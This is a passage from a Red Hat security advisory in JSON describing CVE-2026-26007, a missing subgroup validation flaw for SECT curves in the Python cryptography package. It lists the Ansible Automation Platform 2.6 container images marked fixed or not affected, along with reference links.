"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
